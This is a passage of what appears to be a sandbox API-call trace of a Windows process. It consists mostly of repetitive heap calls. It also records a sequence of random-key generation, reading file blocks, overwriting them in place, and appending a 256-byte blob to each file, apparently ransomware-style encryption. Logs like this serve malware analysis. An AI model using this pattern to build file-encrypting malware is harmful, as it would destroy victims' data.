hHeap=0x280000) returned 1 [0075.190] GetProcessHeap () returned 0x280000 [0075.190] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.190] GetProcessHeap () returned 0x280000 [0075.190] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.190] GetProcessHeap () returned 0x280000 [0075.190] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.190] GetProcessHeap () returned 0x280000 [0075.190] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.190] GetProcessHeap () returned 0x280000 [0075.190] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.191] GetProcessHeap () returned 0x280000 [0075.191] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.191] GetProcessHeap () returned 0x280000 [0075.191] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.191] GetProcessHeap () returned 0x280000 [0075.191] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.191] GetProcessHeap () returned 0x280000 [0075.191] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.191] GetProcessHeap () returned 0x280000 [0075.191] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.191] GetProcessHeap () returned 0x280000 [0075.191] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.191] GetProcessHeap () returned 0x280000 [0075.191] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.191] GetProcessHeap () returned 0x280000 [0075.191] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.191] GetProcessHeap () returned 0x280000 [0075.191] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.191] GetProcessHeap () returned 0x280000 [0075.191] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.191] GetProcessHeap () returned 0x280000 [0075.191] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.191] GetProcessHeap () returned 0x280000 [0075.191] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.191] GetProcessHeap () returned 0x280000 [0075.191] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.191] GetProcessHeap () returned 0x280000 [0075.191] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.191] GetProcessHeap () returned 0x280000 [0075.191] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.191] GetProcessHeap () returned 0x280000 [0075.191] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.191] GetProcessHeap () returned 0x280000 [0075.191] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.191] GetProcessHeap () returned 0x280000 [0075.191] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.191] GetProcessHeap () returned 0x280000 [0075.191] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.191] GetProcessHeap () returned 0x280000 [0075.192] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.192] GetProcessHeap () returned 0x280000 [0075.192] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.192] GetProcessHeap () returned 0x280000 [0075.192] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.192] GetProcessHeap () returned 0x280000 [0075.192] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.192] GetProcessHeap () returned 0x280000 [0075.192] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.192] GetProcessHeap () returned 0x280000 [0075.192] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.192] GetProcessHeap () returned 0x280000 [0075.192] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0075.192] GetProcessHeap () returned 0x280000 [0075.192] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.192] GetProcessHeap () returned 0x280000 [0075.192] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0075.192] GetProcessHeap () returned 0x280000 [0075.192] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0075.192] GetProcessHeap () returned 0x280000 [0075.192] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0075.192] GetProcessHeap () returned 0x280000 [0075.192] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0075.192] GetProcessHeap () returned 0x280000 [0075.192] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0075.192] GetProcessHeap () returned 0x280000 [0075.192] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0075.192] GetProcessHeap () returned 0x280000 [0075.192] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.192] GetProcessHeap () returned 0x280000 [0075.192] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0075.193] GetProcessHeap () returned 0x280000 [0075.193] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.193] GetProcessHeap () returned 0x280000 [0075.193] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.193] GetProcessHeap () returned 0x280000 [0075.193] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.193] GetProcessHeap () returned 0x280000 [0075.193] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.193] GetProcessHeap () returned 0x280000 [0075.193] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.193] GetProcessHeap () returned 0x280000 [0075.193] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.193] GetProcessHeap () returned 0x280000 [0075.193] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.193] GetProcessHeap () returned 0x280000 [0075.193] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.193] GetProcessHeap () returned 0x280000 [0075.193] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.193] GetProcessHeap () returned 0x280000 [0075.193] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.193] GetProcessHeap () returned 0x280000 [0075.193] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.193] GetProcessHeap () returned 0x280000 [0075.193] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.193] GetProcessHeap () returned 0x280000 [0075.193] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.193] GetProcessHeap () returned 0x280000 [0075.193] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.194] GetProcessHeap () returned 0x280000 [0075.194] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.194] GetProcessHeap () returned 0x280000 [0075.194] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.194] GetProcessHeap () returned 0x280000 [0075.194] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.194] GetProcessHeap () returned 0x280000 [0075.194] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.194] GetProcessHeap () returned 0x280000 [0075.194] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.194] GetProcessHeap () returned 0x280000 [0075.194] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.194] GetProcessHeap () returned 0x280000 [0075.194] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.194] GetProcessHeap () returned 0x280000 [0075.194] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.194] GetProcessHeap () returned 0x280000 [0075.194] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.194] GetProcessHeap () returned 0x280000 [0075.194] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.194] GetProcessHeap () returned 0x280000 [0075.194] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0075.194] GetProcessHeap () returned 0x280000 [0075.194] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.194] GetProcessHeap () returned 0x280000 [0075.194] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0075.194] GetProcessHeap () returned 0x280000 [0075.194] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0075.194] GetProcessHeap () returned 0x280000 [0075.194] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0075.194] GetProcessHeap () returned 0x280000 [0075.195] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0075.195] SetFilePointerEx (in: hFile=0x77c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.195] WriteFile (in: hFile=0x77c, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0075.195] WriteFile (in: hFile=0x77c, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0075.195] GetProcessHeap () returned 0x280000 [0075.195] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dbcb28 | out: hHeap=0x280000) returned 1 [0075.195] GetProcessHeap () returned 0x280000 [0075.195] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0075.195] GetProcessHeap () returned 0x280000 [0075.195] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0075.195] CloseHandle (hObject=0x77c) returned 1 [0075.197] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 13 [0075.197] SetFilePointerEx (in: hFile=0x7c8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.197] ReadFile (in: hFile=0x7c8, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0075.197] SetFilePointerEx (in: hFile=0x7c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.197] GetProcessHeap () returned 0x280000 [0075.197] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0075.197] GetProcessHeap () returned 0x280000 [0075.197] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0075.197] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0075.197] GetProcessHeap () returned 0x280000 [0075.197] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dbcb28 [0075.197] ReadFile (in: hFile=0x7c8, lpBuffer=0x7dbcb28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0075.251] SetFilePointerEx (in: hFile=0x7c8, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.251] WriteFile (in: hFile=0x7c8, lpBuffer=0x7dbcb28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dbcb28*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0075.251] GetProcessHeap () returned 0x280000 [0075.251] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0075.251] GetProcessHeap () returned 0x280000 [0075.251] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.251] GetProcessHeap () returned 0x280000 [0075.251] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0075.251] GetProcessHeap () returned 0x280000 [0075.251] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.251] GetProcessHeap () returned 0x280000 [0075.251] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0075.252] GetProcessHeap () returned 0x280000 [0075.252] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.252] GetProcessHeap () returned 0x280000 [0075.252] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.252] GetProcessHeap () returned 0x280000 [0075.252] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.252] GetProcessHeap () returned 0x280000 [0075.252] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.252] GetProcessHeap () returned 0x280000 [0075.252] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.252] GetProcessHeap () returned 0x280000 [0075.252] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.252] GetProcessHeap () returned 0x280000 [0075.252] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.252] GetProcessHeap () returned 0x280000 [0075.252] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.252] GetProcessHeap () returned 0x280000 [0075.252] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.252] GetProcessHeap () returned 0x280000 [0075.252] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.252] GetProcessHeap () returned 0x280000 [0075.252] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.252] GetProcessHeap () returned 0x280000 [0075.252] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.252] GetProcessHeap () returned 0x280000 [0075.252] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.252] GetProcessHeap () returned 0x280000 [0075.252] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.252] GetProcessHeap () returned 0x280000 [0075.252] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.252] GetProcessHeap () returned 0x280000 [0075.252] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.252] GetProcessHeap () returned 0x280000 [0075.252] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.252] GetProcessHeap () returned 0x280000 [0075.252] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.252] GetProcessHeap () returned 0x280000 [0075.252] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.253] GetProcessHeap () returned 0x280000 [0075.253] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.253] GetProcessHeap () returned 0x280000 [0075.253] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.253] GetProcessHeap () returned 0x280000 [0075.253] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.253] GetProcessHeap () returned 0x280000 [0075.253] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.253] GetProcessHeap () returned 0x280000 [0075.253] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.253] GetProcessHeap () returned 0x280000 [0075.253] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.253] GetProcessHeap () returned 0x280000 [0075.253] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.253] GetProcessHeap () returned 0x280000 [0075.253] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.253] GetProcessHeap () returned 0x280000 [0075.253] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.253] GetProcessHeap () returned 0x280000 [0075.253] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.253] GetProcessHeap () returned 0x280000 [0075.253] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.253] GetProcessHeap () returned 0x280000 [0075.253] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.253] GetProcessHeap () returned 0x280000 [0075.253] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.253] GetProcessHeap () returned 0x280000 [0075.253] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.253] GetProcessHeap () returned 0x280000 [0075.253] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0075.253] GetProcessHeap () returned 0x280000 [0075.253] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.253] GetProcessHeap () returned 0x280000 [0075.253] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0075.253] GetProcessHeap () returned 0x280000 [0075.253] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0075.253] GetProcessHeap () returned 0x280000 [0075.253] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0075.253] GetProcessHeap () returned 0x280000 [0075.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0075.254] GetProcessHeap () returned 0x280000 [0075.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0075.254] GetProcessHeap () returned 0x280000 [0075.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0075.254] GetProcessHeap () returned 0x280000 [0075.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.254] GetProcessHeap () returned 0x280000 [0075.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0075.254] GetProcessHeap () returned 0x280000 [0075.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.254] GetProcessHeap () returned 0x280000 [0075.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.254] GetProcessHeap () returned 0x280000 [0075.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.254] GetProcessHeap () returned 0x280000 [0075.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.254] GetProcessHeap () returned 0x280000 [0075.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.254] GetProcessHeap () returned 0x280000 [0075.254] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.254] GetProcessHeap () returned 0x280000 [0075.254] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.254] GetProcessHeap () returned 0x280000 [0075.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.255] GetProcessHeap () returned 0x280000 [0075.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.255] GetProcessHeap () returned 0x280000 [0075.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.255] GetProcessHeap () returned 0x280000 [0075.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.255] GetProcessHeap () returned 0x280000 [0075.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.255] GetProcessHeap () returned 0x280000 [0075.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.255] GetProcessHeap () returned 0x280000 [0075.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.255] GetProcessHeap () returned 0x280000 [0075.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.255] GetProcessHeap () returned 0x280000 [0075.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.255] GetProcessHeap () returned 0x280000 [0075.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.255] GetProcessHeap () returned 0x280000 [0075.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.255] GetProcessHeap () returned 0x280000 [0075.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.255] GetProcessHeap () returned 0x280000 [0075.255] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.255] GetProcessHeap () returned 0x280000 [0075.255] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.255] GetProcessHeap () returned 0x280000 [0075.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.256] GetProcessHeap () returned 0x280000 [0075.256] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.256] GetProcessHeap () returned 0x280000 [0075.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.256] GetProcessHeap () returned 0x280000 [0075.256] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0075.256] GetProcessHeap () returned 0x280000 [0075.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.256] GetProcessHeap () returned 0x280000 [0075.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0075.256] GetProcessHeap () returned 0x280000 [0075.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0075.256] GetProcessHeap () returned 0x280000 [0075.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0075.256] GetProcessHeap () returned 0x280000 [0075.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0075.256] SetFilePointerEx (in: hFile=0x7c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.256] WriteFile (in: hFile=0x7c8, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0075.256] WriteFile (in: hFile=0x7c8, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0075.256] GetProcessHeap () returned 0x280000 [0075.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dbcb28 | out: hHeap=0x280000) returned 1 [0075.256] GetProcessHeap () returned 0x280000 [0075.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0075.256] GetProcessHeap () returned 0x280000 [0075.256] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0075.256] CloseHandle (hObject=0x7c8) returned 1 [0075.258] 